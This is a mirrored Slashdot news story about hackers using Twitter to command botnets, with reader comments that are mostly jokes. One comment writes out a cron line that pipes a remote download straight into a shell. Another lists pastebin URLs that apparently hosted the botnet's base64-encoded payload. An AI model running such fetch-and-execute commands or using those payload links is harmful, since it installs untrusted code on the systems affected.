Slashdot Mirror

← Back to Stories (view on slashdot.org)

Twitter Used To Control Botnet Machines

Posted by ScuttleMonkey on from the it's-all-spam-to-me dept.

DikSeaCup writes "Arbor Network's Jose Nazario, an expert on botnets, discovered what looks to be the first reported case of hackers using Twitter to control botnets. 'Hackers have long used IRC chat rooms to control botnets, and have continually used clever technologies, such as peer-to-peer strategies, to counter efforts to track, disrupt and sometimes decapitate the bots. Perhaps what's surprising then is that it's taken so long for hackers to take Twitter to the dark side.' The next step, of course, is to code the tweets in such a way that they aren't so suspicious."

29 of 127 comments (clear)

  1. sweet by Eleed · · Score: 2, Insightful

    More reasons to hate Twitter

    1. Re:sweet by Marxist+Hacker+42 · · Score: 2, Insightful

      Quite possibly. My objection to twitter is the same as all bandwidth-limited Web 2.0 solutions; shorter messages encourage bad grammar and worse content.

      And at 120 chars, that makes the bad grammar and worse content *very bad*.

      --
      SJW: a person who perceives an injustice, and while correcting it, commits a greater injustice.
  2. Sure, but by operator_error · · Score: 4, Funny

    Sure Twitter is just a large botnet, but is anyone really in control?

  3. Holy shit! by SatanicPuppy · · Score: 5, Funny

    Who knew Twitter had a use?!?!

    --
    ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
    1. Re:Holy shit! by Korin43 · · Score: 4, Insightful

      So basically we need email, but with a 150 character limit?

    2. Re:Holy shit! by michaelhood · · Score: 3, Funny

      Twitter (read: mircoblogging) has tons of potential just waiting for imaginative developers.

      >

      Funny slip that you should call it "mircoblogging" since Twitter is basically logged IRC without channels (hashtags even use #) and a dysfunctional search. Welcome to 15 years ago, kids.

    3. Re:Holy shit! by AP31R0N · · Score: 2, Funny

      No can do. i'm entirely too stupid. i am so humbled before your superiority that all i can manage is to tell you how dumbfounded i am at your magnificence. You're clearly smarter than all the people working on using twitter for these applications. You could be the hero who saves the world, why are you keeping this secret to yourself? Save us!

      --
      Utilizing the synergization of benchmark e-solutions to pre-workaround action items!
    4. Re:Holy shit! by davester666 · · Score: 3, Funny

      Somebody finally found a way to monetize Twitter!

      --
      Sleep your way to a whiter smile...date a dentist!
    5. Re:Holy shit! by timeOday · · Score: 3, Informative

      I think he's right. I asked a twit co-worker what the heck it was for, and he said aggregating all the various sorts of information, email, texts, rss, etc. My question was why did we split them up in the first place? It should all be email. (Especially texts, I'll never accept that one). Now get off my Korean lawn.

  4. Reliable by Marillion · · Score: 5, Insightful

    Twitter isn't as reliable as IRC.

    --
    This is a boring sig
  5. It's not suspicious already by Ponga · · Score: 2, Insightful

    This is about as interesting and informative as everything else being posted to Twitter!!
    http://www.wired.com/images_blogs/threatlevel/2009/08/botnet_arbor.jpg
    :D

    1. Re:It's not suspicious already by sootman · · Score: 3, Funny

      Hmm... so you're saying I should take out this cron entry...

      * * * * * curl twitter.com/evilguy | sh

      ... that I added per the instructions in some stranger's .sig?

      --
      Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  6. please do go down that rabbit hole ... by neonprimetime · · Score: 2, Interesting

    There's something ironic about this finding, given that Russian hackers allegedly used a botnet to take Twitter down for two days last week. But we won't go down that rabbit hole.

  7. Re:Alas, Babylon by clone53421 · · Score: 4, Insightful

    That's actually an interesting thought... it was sending obfuscated URLs to code that the zombie bots would download and execute.

    Wouldn't it make sense, rather than having Twitter simply kill the account, to allow the "good" guys to craft some sort of zombie-self-destruct and tweet its URL over the account? Imagine, all the bots automatically downloading and executing a specially designed tool that removes the malicious trojan...

    --
    Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
  8. I <3 English by sootman · · Score: 4, Funny

    "Twitter Used To Control Botnet Machines"

    It used to, but it doesn't anymore, right?

    --
    Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  9. You go Jose! by GPLDAN · · Score: 4, Interesting

    Jose and those guys at Arbor are doing really concrete things to curb botnets and malware contagion. They have their gear in a great number of peering points around the world, and are correlating huge amounts of data into discrete patterns. I've seen Jose speak a couple of times, and I am impressed by the manner in which they are finding the ghosts who think they can't be found.

    1. Re:You go Jose! by 99BottlesOfBeerInMyF · · Score: 4, Interesting

      I've seen Jose speak a couple of times, and I am impressed by the manner in which they are finding the ghosts who think they can't be found.

      I haven't talked to Jose for a while, but last I heard he and the other guys were doing well finding new types of malware and separating out malicious network traffic that is hard to differentiate from legitimate traffic. That said, they were not really doing things to find the one off attacks perpetrated by people who weren't interested in large scale and automated network attacks. The people I'd call ghosts are the ones who do small scale, specifically targeted attacks to get what they want, then walk away. If you're running a botnet, you aren't being very ghostlike; maybe more vampire like :)

  10. Crowdsourced botnet by Kligat · · Score: 2, Interesting

    Wouldn't it be weird if someone made a botnet that would follow the directions of anyone that posted on Twitter, with people being able to suggest one command per day that would get upped or down by the masses? Aside from the programmer, who would be held responsible if it were operated like that?

    1. Re:Crowdsourced botnet by TheRaven64 · · Score: 3, Funny

      There's already a botnet like that, but it runs on poorly-secured human brains rather than computers.

      --
      I am TheRaven on Soylent News
  11. Twitter and many others! by hesaigo999ca · · Score: 3, Interesting

    Anything that can be pinged and return any sort of tcp/ip packets could be a control center if the contents of the packets can actually
    be translatable and have been mapped accordingly.

    ie- ftp server has certain verbose return that may be configured based on what is being done, so the botnet program calls home to an ftp server...looking like a plain jane communication to any one looking. It tries a few different commands to which the ftp server can reply (with error messages) it can not proceed, however inside the ftp server error message is a text string that contains certain
    key phrases.

    This scenario is similar to steganography, of hiding in plain sight, inside an image, the contents of data....
    I think it's cool to be able to pass off information that is hidden to regular onlookers, but is a lot of coding for nothing if you ask me.

    Set up a twitter account where a particular page has the commands for all your bots to follow, and....wait a minute....

  12. It's easy to do. by lymond01 · · Score: 5, Funny

    No onE would Think of uSing slashdoT As we aRen'T nearly as oBviOus as someThiNg likE Twitter. // Especially with all our talk about supporting Linux and such.

    1. Re:It's easy to do. by Pulse_Instance · · Score: 5, Funny

      We use linux to read slashdot so your net start does nothing to us.

  13. tried it, but... by wibald · · Score: 4, Funny

    Sure they tried using Twitter to control their botnet but after sending out one set of instructions they got bored and went back to playing MafiaWars on Facebook.

  14. Perl by BJ_Covert_Action · · Score: 4, Funny

    The next step, of course, is to code the tweets in such a way that they aren't so suspicious

    And people said that perl obfuscation, poetry, and golf tournaments didn't have any practical application. Ha!

    --
    Motorcycles, Robots, Space Gossip and More!
    1. Re:Perl by bugnuts · · Score: 3, Funny
      upd4t3 posted:

      ^<@<.@*
      }"_# |
      -@$&/_%
      !( @|=>
      ;`+$?^?
      ,#"~|)^G

  15. Interesting code actually... by 0100010001010011 · · Score: 4, Informative

    From the looks of it it's all base64 encoded shortened URLs.

    aHR0cDovL2 is http:///
    aHR0cDovL2JpdC5seS is http://bit.ly/

    The first one is clipped.
    The rest go to a pastebinish sites which have gbpm.exe encoded as Base64. It also appears the base64 is different but the exe has the same name (I'm guessing it's changed 'output'?)

    http://rifers.org/paste/content/paste/9507/body?key=upd4t3
    http://rifers.org/paste/content/paste/9508/body?key=upd4t3
    http://rifers.org/paste/content/paste/9509/body?key=upd4t3

    They also use Pastebin (http://pastebin.com/pastebin.php?dl=m49f3b4c2) and Debian.net (http://paste.debian.net/44059/download/44059) but both of those file have been deleted.

  16. U2VjcmV0IGNvZGU= by Anonymous Coward · · Score: 2, Funny

    d2hpbGUgKHRydWUpIHsNCiAgICBwaW5nIHR3aXR0ZXIuY29tDQp9

  17. Twitter only 98% pointless babble by David+Gerard · · Score: 2, Funny

    [to be posted uh tomorrow, probably]

    Only 98% of Twitter updates are "pointless babble," says a new report that studied 2,000 tweets over a period of two weeks.

    The top category was "pointless babble" tweets, with nearly 98% of tweets being inanity no sane person could want to read, retweets of inanity, links to inanity, retweets of links to inanity and retweets of retweets of links to links to the reretweet itself. And camera phone pictures of bowel movements on Twitpic.

    Almost 2% was Stephen Fry, Neil Gaiman or retweets thereof and the rest was Warren Ellis posting scatological abuse of his fans.

    Botnet command messages were becoming more popular, many disguised as combinations of the syllables "lol" "wtf" "d00d" "RT" and "#fb" or scatological abuse of Warren Ellis's fans.

    Twitter's demographics as of June 2009 were 55% female, 43% ages 18 to 34, 78% white, and 99.5% of such short attention spans that Facebook might as well be War and Peace. Botnet readership was considered likely to rise as soon, nothing with organic intelligence would be able to cope.

    Twitter recently redesigned its homepage, changing the tag "What are you doing now?" to "Post tomorrow's CNN headlines, particularly about #goatse."

    --
    http://rocknerd.co.uk
  18. Let's face it, all joking aside by Patchw0rk+F0g · · Score: 2, Insightful

    There ain't any technology that one human(s) can come up with that another human(s) can't corrupt.

    I don't care how quick, savvy or exotic you are, you're not going to foil everyone forever. I figure it's just a state of grace we have: there's a situation whereby the technology is benign, if asinie; a state whereby it's corrupted, abused and malicious; and a state whereby it's antiquated, unused, and maligned.

    I hope Twitter's now made it to that last stage now.

    --
    When the going gets weird, the weird turn pro. ~~ Hunter S. Thompson